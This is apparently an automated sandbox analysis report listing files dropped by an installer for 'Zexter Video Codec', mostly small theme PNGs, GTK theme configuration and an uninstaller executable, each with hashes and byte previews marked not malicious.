                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD._._._.4.....pHYs.........B(.x....tIME......*........IDAT(.....0....Uh..C#`....&._...p%..qs.....H...K:....E.S...u....TU.+.R5M..B.m..y.._... ..Zk9M.`.}*.>..C..8.:..I...8.....a.v.......h.b..A....n.T...C...c.%...G..i.2J.+.J)GB...wY......:...,.D.Y?..F..Z.....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\rangeslider-ins.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):593
                                                                                                    Entropy (8bit):7.479894563773081
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIniUpZzmH9D1hP79P2J2ySk9BvSpqKu6kZPdiaXVygV271:giUpMDrD8J2ySMKIZoaX0gV271
                                                                                                    MD5:FFCCEC64441F01C7AA82069BB8D5E9D9
                                                                                                    SHA1:45C02522F48129065104E1C9B4E6AC63434CC7D9
                                                                                                    SHA-256:B8CEB44936275B37F8D08F71F01F223866CEE50E53182D529A3768514A8C7662
                                                                                                    SHA-512:E8709643F6C4CBAA98F7BF870028664324DE673141F1B9FCE995A03D011C4374817846DCED739B4A3DD37D315A474F739ACAD2933ACA63C67FA0216356B8E608
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sBIT....|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<.....IDAT(S...n.@.....I#;.X.j...U,.@..x..Bx.D.....W..X.b...Fqq.Z.RED8...3.s..l.H..9s...9:D)..1^..m.........R.@...>.T...97..=..z[......i7Q...<...F...di.......R....]...F...u.......W?41&v.6.O^.%ko.\".qH...)....$..z.NJe{o....."..N....NgXDK.q...y...d.@.q].20.9..(...A.a|~.J..F..$..2pn....$....N.4.2AR.R......`"3..R_....[v.h.n.!...5Gq..QA.Y,.....\..Z....{.h.............mU-..T.Ga..0.{....w..$K..?oN....4KW......'^py.fd..L.)L.z.O(..D..)H...............<....o....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\rangeslider-pre.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):502
                                                                                                    Entropy (8bit):7.307082621377148
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H5kGLptWrJMNbLtUWrPwIfYSA2go4aOq07:HS2H6G16JEbSuff8hnaOq07
                                                                                                    MD5:9BBFAFFA43A8745739977748E1680DAB
                                                                                                    SHA1:A2DE96CC6B8D6A22F2E517ED8828A0E65769C6EB
                                                                                                    SHA-256:EAD5682AA1875AC0664177D32B817A0BE555B90AABB88DD8FA914FAF42125896
                                                                                                    SHA-512:3E1E77835D3786D1FFAE02EAEFD41FEF7BD55955F08806C176A5E5A06169029F07E194D001927E5AEAD066FA41C90CA1B41E354F274C3AA1C6A78EF0E37717E1
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....2...i....vIDAT(S.RKj.Q.4..=....*.h.......].....y...E.j.O.....d.,.7..._.......`0.....p8|...}[..H......t..j...l`.6F....2G..x.D.7...^..8......d..{e%..H$.\...x..j..~....B.R..d......}d2.d.Y..u,..l.[.v;....P(.4..D..+^....<.."..*.g..Q.Z..r...4!E>..LT*....n..l4.*FQ..VI.....&..........eYOVM6...@....5...L.T*.J...p.rq..=."p2.`6.a:.....I5.s........I..\.@..F....rB.b..I....'...r..O...{7.\....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\rangeslider.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):517
                                                                                                    Entropy (8bit):7.3380534299819
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H4ZZG1CXGrA0JI/88sXEZ1gBxPibGo1+bsI:HS2H4ZGCWXC/tHZ10PiaJP
                                                                                                    MD5:156D5836B29559FD2A8AFACFA2931192
                                                                                                    SHA1:D92B24898B7483591E5B088C60D05B73355AD0EC
                                                                                                    SHA-256:ECE2829963DECBC954FDBC7F831451D36F1248EBDEAAC181B68AEBEC00BE3555
                                                                                                    SHA-512:591CCEED7768A3D6C87A9DC7EE34F9B1A1463AEE30C184027C24294901179BA9C6BFF697FD7004E22F12605D45CB7BC18FFE1C9D7D798A7AB40004FF36FBC656
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....2.........IDAT(S..Ij.Q....v..a..m..(...}...!.&!'.W.=T...mW.....<t..X...$.....E..G...R..;.i>.C.z._...p8|.n...o6.w....r..r9.8..M...h4.....;q...7.M.t.Z.Z-[*..P((.Z.R.......l`.AN.%.LVR..aY.!...@...#......^i4........r...nG..^....f....gd`.~0.9hD,.S.a..>e2.8T......E..t..x.= d..".._@..$...Bq..m=....f..n#.,.t.Z..EW...o.1w1B]p .....0b....w.^'...=.`p:.tD|.d2...i..\..=9......j......<1..._...+."..V|....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\slider-h-ins.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):636
                                                                                                    Entropy (8bit):7.494209461570772
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIniUpZVqDOd94j4MwzQPlA89rnKP69TRUQMGsVc7:giUpXjBMwMPlA8BZ9OFGsk
                                                                                                    MD5:FE02DBEC1FBF19F2525E9C87E3023C7C
                                                                                                    SHA1:9503756A6C1CB9C742B6852F121B6D8092C06578
                                                                                                    SHA-256:CB2D73D2E08790836F67F4CCA213206C071F2215D65CCD0099EDD2B9A912B578
                                                                                                    SHA-512:CADBCCEE87CB20DA46E1E4BD9241EE22CF7BA6DE9B8ECAD2D1F3831A8AAE5D0061663F57815BCA19F2580C824EC599891726A240292E6AB289013A6AE971E2A0
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sBIT....|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<.....IDAT(.U..k.A.....^.W.Mj*.D.P.^..._. .BJJ.h.....Kv...&B..............H.....6..1.22s..t:............4=.......#.#\]..s......./.....t..{;.....+<y|.4=Dr..(*....>..d.]7h>8.{yT...N.........m...c...NO.X....V...F.7. ....n.io.n...I.T.2..F....q+`..$.0...!...P.{U`..1...'.J..B.w..1.!...<...J..[.........j...A.<.c...A~...R.Z<...85@.KI\....1..m........\v....FU....`.T.e.#......_`.rC].s^.S.r]W... _.C.Cu...ju.....5._...P....r..^A.r\^|.$y...&..<......y.e..s\.....dc.....!O..qE.h...I..s..Z...?...4f%......IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\slider-h-pre.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):559
                                                                                                    Entropy (8bit):7.393060209024772
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H1ClNHN+5CWPctjcNirsMD0YrO5kOBMlz:HS2HkHeCmPGxbibO9
                                                                                                    MD5:C720EFDABF3F8B47BD07FCFE80AF5608
                                                                                                    SHA1:A63400832DC55C911113C0176DA2EE6DF04F5D4F
                                                                                                    SHA-256:C81909BB15E1417A075DB27E1FA348C9371F68BF55B434FC70FB28FD5AED37AD
                                                                                                    SHA-512:1EF5ADCDE29FC4316DB7292D53741C3330BF17203B24EFDB6D1112413763FE37822BBDD9008B0C0E7A2210FA519D56922CB574C23043A12954FEF9ECDCBF382D
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....0..a......IDAT(.U..j.A.....#.B.B...H!.Jc..". !u.@.&.E .`X.Pl....].s....\f...=g..\.b.z..,.j:.S;.N.<.>.....N..4....=...f.*..{.BA<..t*..$..f.........r]..Z..*....iI&....H............J...@A.X,>@I.....q..b..T.Vu...._,./.v....3...}_'...Q]...H;a....T*.c..n.m1...g..J..#J)..\\>....#.C..D.3...d\.^^....q%hlse.....~..L.f.L.LaZ..g.Jw...n....y.......>....M1.I4.. ...@...A.1... . |.lV..[C.A.n.P.U*.T.\.r.... ..8..FK...#w;..y.r...]...............IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\slider-h.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):549
                                                                                                    Entropy (8bit):7.372873904443628
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H0ZF0NS5rNgZK5S80iwpLboX30XuQBMBVEB5Hk:HS2H/NS17A8v1X3wuxYY
                                                                                                    MD5:FA26AC420BEA517A2C4247572E33842E
                                                                                                    SHA1:06DE61402AAA1A2ADC2EF2969E76B7200A9D13AA
                                                                                                    SHA-256:8D8451A732FA6662F6FCE32CCF6751E421C6FFC7C5B819C29AB1482967B05FFA
                                                                                                    SHA-512:8850CFCD06A82FA41D4B30F88DE5485857B2BD1B548CEC4A7F38B78E3427AEDA01B44762161D8352501F6AE0EBBAEE82AF71F52296CCB93399B4C01C6864D382
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....0.[.......IDAT(.mR.j.@........(.".."~C.n...Q.!...n.u.O.).+A.*..&>{..)..\2s.{....z...m..W.T.r.<0.....po.. 0X..Az..3....J....L.S..f.r..P....."I.T..hx.fS...../.lV.(..z-.~_..qx>..HV....b..J%Z...@.........e.X.A.%....LFN..&1.&..X.......l.,.T..@....m]`...j...b.s ...c.Z+.N.$..R.@.i..s.H.-....).0W`....I..D.x/xF7.(>.~..LuCf.L$..a...`.}...q....=5.! ..r.........I...6..8.]rnF...j...j5..-...|>....$@.nG.9. .":..!...x<....._.....`7....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\slider-v-ins.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):641
                                                                                                    Entropy (8bit):7.486329990930914
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2HcHsH4mHgE42VgbsrP2eByHKk8a4JLk++8/1:HS2H8mJJfIsrueEq9z+c1
                                                                                                    MD5:752E6CDC2C92BF4D22712F33A380CB93
                                                                                                    SHA1:07AC399AD6C9F72E97A1304E1324AD20EB42F633
                                                                                                    SHA-256:3294FEF8285A13B09967D3F631F8CE52C2AACC9A07604CD51B70811BED2ED40E
                                                                                                    SHA-512:9DC2C06873DE889B4E26AA9890B93E6FD37D04C73801865861FA46B95C2011BFEEC94B24F37BBD376C43E993FEE58D1C4A221AF09346CE70AF86BF379BD6CCA2
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....1*........IDAT(Se..k.A...|.n...n..T.%&X.....7.d_.".KA..T.J..Z.....w6D..e.e...=s......S.x..G=.....8"S.%/..|.....8=y1....:2...;.B.(K.I.W.kE../>....Z.r?.7<.~....t...BJ.i../.J...tz......7..!.J,.#..v.....9.Y....YQ....?|t............$V.@....zp...;!TU.M.......A..N.....[..V...&....9..xm..d2F.m..`.N......&.A.DU.....y.4....4....`8...\.|...y...q.]^~......@qXor....Ik..3.@+..V~d...........?7k...`.C.P.ZT.....QF-E.{..+5!... .6..(.i..`m....._~..e.n5.`0..z...Qr..IF.E..9Y.....r~ [.@8...k2*...$....n...orX'#..&........X....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\slider-v-pre.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):556
                                                                                                    Entropy (8bit):7.316549998180671
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H9fw3E/3lkWcxh66ScOaqgx531nDqLwzIdjzRvL77:HS2H9YU/eWIfScvbnDzzchvLH
                                                                                                    MD5:E4118A159AC2AAB1876E440CF770CA3D
                                                                                                    SHA1:27A28242395D33530A955D2D6FE479A9D45DB0CC
                                                                                                    SHA-256:08268FF255BFD01B6AA0184ECD06B5A0C48D016BC429D3B155B7149A8CD10FDF
                                                                                                    SHA-512:611EAC1EB04097730CD7B8D9C52FF7DA5D2F741E8C4A54F291C0137B75DD326F42CF35AEDBDB17D153BA20845904BE9F1F3753069B36D3050E907FA5C3D3461A
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....0;..]....IDAT(SmR-o.A....;.8.5.....T..V`+....6.....L-..... ...Q........L2...y3ogF;..BI.Rq5M{.u.t8...3......{..j3..) @O.|$...b..q..z.......F3$x....$.4..l6...[.B..<...R4..E....k.r.E.^.X.K..b...|...J0..F.g..y&.TM&.n>.......).@[Uv.Gx...z...G)..X.hT.-,...XL...V....\.g.W....).. ."..<..Z.N.j.d..a...D..8).L.`...b.F{0.<b..A0.DUB.J:..I.mr.....t-f..V+.d...|.....n~....g.....~NW.'...t:c.....R)....(.d..v.`...V...e.f.!........)...[..-./..._x=t<....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\slider-v.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):551
                                                                                                    Entropy (8bit):7.319024742694981
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2HRd4HSOKRcIzpsbPjUdb4pndLBaXeeFUDqtCmN09:HS2HRd4HSBR5KbPognzadIb
                                                                                                    MD5:731657BF68ECC98F0DBE29095CCB88F7
                                                                                                    SHA1:D3B49C3AD148EC96F3088371715121D32EAA7843
                                                                                                    SHA-256:F95DA774191F393BA0EB0436B4CB22920C5F880ED51010177E6E9189CD36C44A
                                                                                                    SHA-512:DE50FC25578922C8BE31D869B70FC0559C965022D6BCCF71DE6CDD541B424DB67E1AE1032AEBAAE03DF66744A27344194AA7994C9CE84317D1AFD1B437D9AA9E
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....04.k......IDAT(..R.j.Q..}..z.%..h.N..OHa../H.......E>!HPl...F\.+n|f..1.*......9.v.\H.Z.&4M{.u.~>.....w>w....v...)"......"...a....@....n.kN.`.kH.)...K..kY..N.0..#1...=..s...A..0M.\..p%.R...B.b..f3..........."......q.J&...).N.b....5A......@.&.c.!.d...\.Z.Vu..V....."H.xO$...e.HX,....WL.`....F....."...m[bu..c.B.u.u..PB..4...U..._.]..*....KY...l<..a .v..>.s.4.....f#..}0..d2.8A#......*wUU...}.N.?.p=rlJ+.J.n..J#.......7\.R.-.c%....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\trough2-h.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):437
                                                                                                    Entropy (8bit):7.172409807946269
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMfbllRNTwF4Aca6vxsbrVnsgP7F9J6Jz17:HSbHRhwF4A56vuZ/Z6t17
                                                                                                    MD5:E51360FDC759C15DEF4ED591275F6E37
                                                                                                    SHA1:723E725BAB93316AA5CBEEAF65A782777DD28983
                                                                                                    SHA-256:559FD805D661B05A7B67119EF93067D6BF076D5A92470F343332D80EB6C67168
                                                                                                    SHA-512:8BE34022F9188993A642A10A31D3AA05865254C69134726F5C1891E6537AF94A6E625D63A6E8D3C058A10E49A60D03C407AD8D6D70F09452D91957680D99E115
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD._._._.4.....pHYs.........B(.x....tIME........Oj....5IDAT(..IN.@........7n.....\.3@....0&2...._./..J.Tu..5.8.fQ...;......|....*...[.$..>.#..z_A.,....|;.i.^.2^...5...R..U..y.,.8<...<.-;cJ)..E.(.0.....Z.s]..B....:..1.;dud...P..D.G.J..4Ml/.l..!.3.H....q.I..H..a.....I.uK`..^ ...s...2gL..\..(h@!.....R(S...8....a...K.kAf..."V.h0...N?v..}.~..c...t$!&.lo?..z...qm....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\trough2.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):434
                                                                                                    Entropy (8bit):7.191504491746101
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMfbllDGOEGFo+bciyq44LnHolz:HSbHCOEUo/W4EHa
                                                                                                    MD5:7E5A76C4CF167C7549FAD937DC8B3DA3
                                                                                                    SHA1:7BDBE8BE6737C51C292AA8F51F9586DB0432AB39
                                                                                                    SHA-256:77D9DBC6CC93882EEC1BA969D14AD6C0FDEFE35302F0F930751C4B5BAED2ABFE
                                                                                                    SHA-512:30D230F3F7A62425D92B5227D482E000741C34769BB88CB0F4EDABA782D3834892D9C0A1BC4468DA667951FF489453FD2B3B426ADC38BF6BA5EA34CEEACCC077
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD._._._.4.....pHYs.........B(.x....tIME........A.....2IDAT(...j.@...O..b......l..>....v..U.....X.t.L....x.{.Q.n....A.m/).jG-..)..~....2-...Ey..jQY....u=4Mcr......<.i..7.....*.....(..s..i....*.+.......!...^V.v.. .f..b1H..E.Yh.w.........7..$...5..R.....f.~.T.l+..^.<.....'&I.1..pG'...i...d2.0...DQt..Yny.".`]....%@.)?L;.u..........yK.....s~.}...?.8.Ty2y.....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\is-5HLRD.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24
                                                                                                    Entropy (8bit):4.136842188131013
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:1ERdiAqRv:1+MJ
                                                                                                    MD5:2BE834BAC02BFB69E1E7935A62A6B8FB
                                                                                                    SHA1:6165F776AC298A991E497B03E9C2E1797ED81029
                                                                                                    SHA-256:113DBDDEAEE29ED930AF404A0C0D5356A95D9D1B53BAE343F2782A29B5D4DBC9
                                                                                                    SHA-512:1F3BC0176EC15394E6CAD295A077F33C66BD9FEA4598715B5EDED4DDE397DE519FFC6D171E9DB53A09A50929FE6D8EDE5D4D51B5B786A0C3BE6481CB7A5BA4FC
                                                                                                    Malicious:false
                                                                                                    Preview:[General].Iconset=Light.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\is-9HPS3.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24
                                                                                                    Entropy (8bit):4.136842188131013
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:1ERdiAqRv:1+MJ
                                                                                                    MD5:2BE834BAC02BFB69E1E7935A62A6B8FB
                                                                                                    SHA1:6165F776AC298A991E497B03E9C2E1797ED81029
                                                                                                    SHA-256:113DBDDEAEE29ED930AF404A0C0D5356A95D9D1B53BAE343F2782A29B5D4DBC9
                                                                                                    SHA-512:1F3BC0176EC15394E6CAD295A077F33C66BD9FEA4598715B5EDED4DDE397DE519FFC6D171E9DB53A09A50929FE6D8EDE5D4D51B5B786A0C3BE6481CB7A5BA4FC
                                                                                                    Malicious:false
                                                                                                    Preview:[General].Iconset=Light.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\is-K2QCH.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15008
                                                                                                    Entropy (8bit):5.270725103917416
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:s/nUm8NYR/fiYM8LXMX5fs38Ffx4Bf0lAT9:s/nX00iY/XMXq38FxK0lq
                                                                                                    MD5:64C98ACB587FC7E4F237EADAA84A591D
                                                                                                    SHA1:B92C3D066E67FC230D56E690AE1CC21222265614
                                                                                                    SHA-256:6E8E87C68E7EFC5CCF8694042649DE3EBA01EC1DF242C22D40842AF885D1118D
                                                                                                    SHA-512:B1542C0E3D5411CD8581150FE2D81401C93686E7E43754E8BF8F78ACBEB73A041F7D9223D7DC8072C132273D1DB6EB9917ED04F9F2123C1CEA4062E59CD7F129
                                                                                                    Malicious:false
                                                                                                    Preview:#.# This file is part of RawTherapee..#.# Copyright (c) 2004-2011 Gabor Horvath <hgabor@rawtherapee.com>.#.# RawTherapee is free software: you can redistribute it and/or modify.# it under the terms of the GNU General Public License as published by.# the Free Software Foundation, either version 3 of the License, or.# (at your option) any later version..# .# RawTherapee is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with RawTherapee. If not, see <http://www.gnu.org/licenses/>..#..# Please keep this gtkrc in sync with the other ones from Clearlooks based themes...gtk-color-scheme = "rt_base_color:#ffffff\nrt_fg_color:#101010\nrt_tooltip_fg_color:#000000\nrt_selected_bg_color:#7C99AD\nrt_selected_fg_color:#ffffff\nrt_text_c

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\is-LP383.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3276
                                                                                                    Entropy (8bit):5.106247394055059
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:9yjeGR/K4ysHjBcKKFyY+fwVsFcDIYMkSnvRN55FQcsFnZFnFveKW+dFKeQFqer/:sjbR/njBz1QsFcUYnSR3QzwLwS
                                                                                                    MD5:72CACEE801EFA43AE137706B6A355D87
                                                                                                    SHA1:20AB5543B96FB36AE8540DF45022229E0A1EE780
                                                                                                    SHA-256:72EC12AEC248C88FA8D0EC7D3185F74006E45D092736B9EF8C15692C69A1355E
                                                                                                    SHA-512:FB2769296F2CF702E7387B6F959FE02EFC2AC96C9E782472C6CA93BD9E8C76FBE2BD725AF227E7444452735B96757C3ACFF51BE5D6A1FB6226E5FD7583D00FC6
                                                                                                    Malicious:false
                                                                                                    Preview:#.# This file is part of RawTherapee..#.# Copyright (c) 2004-2011 Gabor Horvath <hgabor@rawtherapee.com>.#.# RawTherapee is free software: you can redistribute it and/or modify.# it under the terms of the GNU General Public License as published by.# the Free Software Foundation, either version 3 of the License, or.# (at your option) any later version..# .# RawTherapee is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with RawTherapee. If not, see <http://www.gnu.org/licenses/>..#..# Please keep this gtkrc in sync with the other ones from Clearlooks based themes...gtk-color-scheme = "salt_pinch:#95B0DB\nbase_color:#dddddd\nfg_color:#0A0A0A\ntooltip_fg_color:#000000\nselected_bg_color:#95B0DB\nselected_fg_color:#FFFFFF\ntext

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\slim (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3276
                                                                                                    Entropy (8bit):5.106247394055059
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:9yjeGR/K4ysHjBcKKFyY+fwVsFcDIYMkSnvRN55FQcsFnZFnFveKW+dFKeQFqer/:sjbR/njBz1QsFcUYnSR3QzwLwS
                                                                                                    MD5:72CACEE801EFA43AE137706B6A355D87
                                                                                                    SHA1:20AB5543B96FB36AE8540DF45022229E0A1EE780
                                                                                                    SHA-256:72EC12AEC248C88FA8D0EC7D3185F74006E45D092736B9EF8C15692C69A1355E
                                                                                                    SHA-512:FB2769296F2CF702E7387B6F959FE02EFC2AC96C9E782472C6CA93BD9E8C76FBE2BD725AF227E7444452735B96757C3ACFF51BE5D6A1FB6226E5FD7583D00FC6
                                                                                                    Malicious:false
                                                                                                    Preview:#.# This file is part of RawTherapee..#.# Copyright (c) 2004-2011 Gabor Horvath <hgabor@rawtherapee.com>.#.# RawTherapee is free software: you can redistribute it and/or modify.# it under the terms of the GNU General Public License as published by.# the Free Software Foundation, either version 3 of the License, or.# (at your option) any later version..# .# RawTherapee is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with RawTherapee. If not, see <http://www.gnu.org/licenses/>..#..# Please keep this gtkrc in sync with the other ones from Clearlooks based themes...gtk-color-scheme = "salt_pinch:#95B0DB\nbase_color:#dddddd\nfg_color:#0A0A0A\ntooltip_fg_color:#000000\nselected_bg_color:#95B0DB\nselected_fg_color:#FFFFFF\ntext

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\system.iconset (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24
                                                                                                    Entropy (8bit):4.136842188131013
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:1ERdiAqRv:1+MJ
                                                                                                    MD5:2BE834BAC02BFB69E1E7935A62A6B8FB
                                                                                                    SHA1:6165F776AC298A991E497B03E9C2E1797ED81029
                                                                                                    SHA-256:113DBDDEAEE29ED930AF404A0C0D5356A95D9D1B53BAE343F2782A29B5D4DBC9
                                                                                                    SHA-512:1F3BC0176EC15394E6CAD295A077F33C66BD9FEA4598715B5EDED4DDE397DE519FFC6D171E9DB53A09A50929FE6D8EDE5D4D51B5B786A0C3BE6481CB7A5BA4FC
                                                                                                    Malicious:false
                                                                                                    Preview:[General].Iconset=Light.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\uninstall\is-1611L.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):720373
                                                                                                    Entropy (8bit):6.507155477779126
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyFZ:nu7eEYCP8trP837szHUA60SLtcV3E9k9
                                                                                                    MD5:74DE04C1DA3B854F12AE2E6C63AACF1D
                                                                                                    SHA1:18B6BEA4B7F04DF51BA3FCE01FDCB2A016714EB1
                                                                                                    SHA-256:CEB3C30CD6ED1CA29EE3A058D953BF2C7FE3B31452B4B8DD219D06D4138310E5
